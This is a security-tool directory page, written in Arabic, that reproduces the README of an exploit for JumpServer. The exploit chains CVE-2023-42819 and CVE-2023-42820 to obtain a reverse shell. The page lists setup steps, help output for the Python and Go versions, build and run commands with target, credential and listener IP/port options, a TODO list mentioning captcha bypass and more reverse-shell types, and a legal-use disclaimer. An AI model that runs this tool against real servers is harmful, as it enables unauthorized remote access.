Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
أدوات/GitHubGitHub/c1ph3rx13/cve-2023-42819
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراق
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

عرض المستودع
63منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-42819

CVE-2023-42819

شرح الثغرة

ثغرة كتابة ملف عشوائي في JumpServer

CVE-2023-42819 + CVE-2023-42820 = GetShell

الاستخدام

  1. ضع السكريبت والملفات المطلوبة في نفس المجلد

  2. تأكد من تثبيت Google Chrome، واحصل على رقم إصدار Google Chrome

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. بناءً على رقم إصدار Google Chrome والنظام، قم بتنزيل chromedriver وضعه في webdriver

    أحدث إصدار: https://googlechromelabs.github.io/chrome-for-testing/

    الإصدارات السابقة: https://chromedriver.chromium.org/downloads/version-selection

    المتطلبات كثيرة جدًا : (

  2. استمع إلى IP والمنفذ المقابلين، وانتظر حتى تعود الشل

إصدار بايثون

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port

image-1

image-1

إصدار Go

بناء

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

تشغيل

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: 代码仅供学习使用,请勿用于其他用途                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

TODO

  • طريقة التعامل مع النطاقات المختلفة ليست أنيقة
  • إعادة الكتابة باستخدام httpx
  • إضافة دالة EXP
  • إعادة الكتابة باستخدام go-resty
  • تجاوز رمز التحقق عند إدخال كلمة مرور خاطئة أثناء تسجيل الدخول
  • إضافة أنواع مختلفة من Shell العكسي
  • استخدام وضع headless لجعله متوافقًا مع Linux
  • إضافة بروكسي http, https, socks
  • CVE-2023-42819 + CVE-2023-42820 للحصول على Shell بنقرة واحدة
  • إذا وضعت أعلامًا كثيرة، قد لا أتمكن من إكمالها : (

الصيانة

  • 2023-10-18 إضافة كشف تلقائي لتفادي التحقق على المواقع - إصدار بايثون
  • 2023-10-18 إعادة بناء دوال العميل
  • 2023-10-18 تبسيط منطق التشغيل
  • 2023-10-18 اختبار Linux نجح - إصدار Go

إخلاء المسؤولية

  1. هذه الأداة موجهة فقط لمختصي اختبار الاختراق الذين لديهم إذن قانوني ولمشغلي الشبكات الذين يقومون بعمليات الصيانة الروتينية. يمكن للمستخدمين تنزيلها أو نسخها أو نشرها أو استخدامها بشرط الحصول على إذن قانوني كافٍ وعدم استخدامها لأغراض تجارية.
  2. عند استخدام هذه الأداة، يجب عليك التأكد من أن جميع أفعالك تتوافق مع القوانين واللوائح المحلية، ويجب ألا تستخدم هذا البرنامج في أنشطة تنتهك القوانين ذات الصلة في جمهورية الصين الشعبية. لا يتحمل جميع المؤلفين والمساهمين في هذه الأداة أي مسؤولية عن أي استخدام غير مصرح به لهذه الأداة في أنشطة غير قانونية.
تنزيل الأداة